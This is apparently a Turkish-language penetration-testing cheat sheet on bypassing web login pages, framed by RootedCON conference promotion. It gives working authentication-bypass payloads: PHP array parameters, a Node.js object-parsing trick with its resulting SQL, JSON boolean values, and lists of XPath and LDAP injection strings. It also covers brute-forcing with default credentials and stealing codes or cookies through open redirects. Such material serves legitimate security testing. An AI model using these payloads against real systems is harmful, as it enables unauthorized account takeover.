RootedCON, İspanya'daki en önemli siber güvenlik etkinliği ve Avrupa'nın en önemli etkinliklerinden biridir. Teknik bilginin yayılmasını amaçlayan bu kongre, her disiplindeki teknoloji ve siber güvenlik profesyonelleri için kaynayan bir buluşma noktasıdır.

RootedCONRootedCON

Normal girişi bypass etme

Bir giriş sayfası bulursanız, bypass etmek için bazı teknikler bulabilirsiniz:

• Sayfa içinde yorumları kontrol edin (aşağıya ve sağa kaydırın?)

• Kısıtlı sayfalara doğrudan erişebilirsiniz

• Parametreleri göndermeyin (hiçbirini veya sadece 1 tanesini göndermeyin)

• PHP karşılaştırma hatası kontrol edin: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

• İçeriği json olarak değiştirin ve json değerlerini gönderin (bool true dahil)

• POST'un desteklenmediğine dair bir yanıt alırsanız, Content-Type: application/json ile GET isteğiyle JSON'ı göndermeyi deneyebilirsiniz.

• Nodejs potansiyel ayrıştırma hatasını kontrol edin (bu konuyu okuyun buradan): password[password]=1

• Nodejs, bu yükü aşağıdaki gibi bir sorguya dönüştürecektir: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; bu da parolanın her zaman doğru olmasını sağlar.

• JSON nesnesi gönderebiliyorsanız, girişi bypass etmek için "password":{"password": 1} gönderebilirsiniz.

• Bu girişi bypass etmek için hala geçerli bir kullanıcı adını bilmeli ve göndermelisiniz.

• mysql.createConnection çağrılırken Object parametresi geçildiğinde, "stringifyObjects":true seçeneğini eklemek, beklenmeyen tüm davranışları engelleyecektir.

• Kimlik bilgilerini kontrol edin:

• Kullanılan teknoloji/platformun varsayılan kimlik bilgileri

• Ortak kombinasyonlar (root, admin, password, teknolojinin adı, bu şifrelerden biriyle varsayılan kullanıcı).

• Cewl kullanarak bir sözlük oluşturun, varsayılan kullanıcı adını ve şifresini (varsa) ekleyin ve tüm kelimeleri kullanıcı adları ve şifreler olarak kullanarak brute-force yapmaya çalışın

• Daha büyük bir sözlük kullanarak brute-force yapın (Brute force)**

SQL Injection kimlik doğrulamasını bypass etme

SQL enjeksiyonları aracılığıyla girişi bypass etmek için birkaç hile bulabilirsiniz.

Aşağıdaki sayfada, SQL Enjeksiyonları aracılığıyla girişi bypass etmeye çalışmak için özel bir liste bulabilirsiniz:

No SQL Injection kimlik doğrulamasını bypass etme

No SQL Enjeksiyonları aracılığıyla girişi bypass etmek için birkaç hile bulabilirsiniz.

NoSQL Enjeksiyonları, parametre değerini değiştirmeyi gerektirdiği için bunları manuel olarak test etmeniz gerekecektir.

XPath Injection kimlik doğrulamasını bypass etme

XPath Enjeksiyonu aracılığıyla girişi bypass etmek için birkaç hile bulabilirsiniz.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Enjeksiyonu kimlik doğrulama atlatma

LDAP Enjeksiyonu aracılığıyla girişi atlatmak için birkaç hile bulabilirsiniz.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Beni Hatırla

Eğer sayfada "Beni Hatırla" özelliği varsa, nasıl uygulandığını kontrol edin ve başka hesapları ele geçirmek için bunu istismar edebilirsiniz.

Yönlendirmeler

Sayfalar genellikle girişten sonra kullanıcıları yönlendirir, bu yönlendirmeyi değiştirerek bir Açık Yönlendirme oluşturabilir misiniz kontrol edin. Belki kullanıcıyı kendi web sitenize yönlendirerek bazı bilgileri (kodlar, çerezler...) çalabilirsiniz.

Diğer Kontroller

• Giriş işlevselliğini istismar ederek kullanıcı adlarını numaralandırıp numaralandırılamadığını kontrol edin.

• Şifre/hassas bilgi formlarında otomatik tamamlama etkin mi kontrol edin: <input autocomplete="false"

​​RootedCON İspanya'daki en önemli siber güvenlik etkinliği ve Avrupa'daki en önemli etkinliklerden biridir. Teknik bilginin yayılmasını amaçlayan bu kongre, her disiplindeki teknoloji ve siber güvenlik profesyonelleri için kaynayan bir buluşma noktasıdır.

RootedCONRootedCON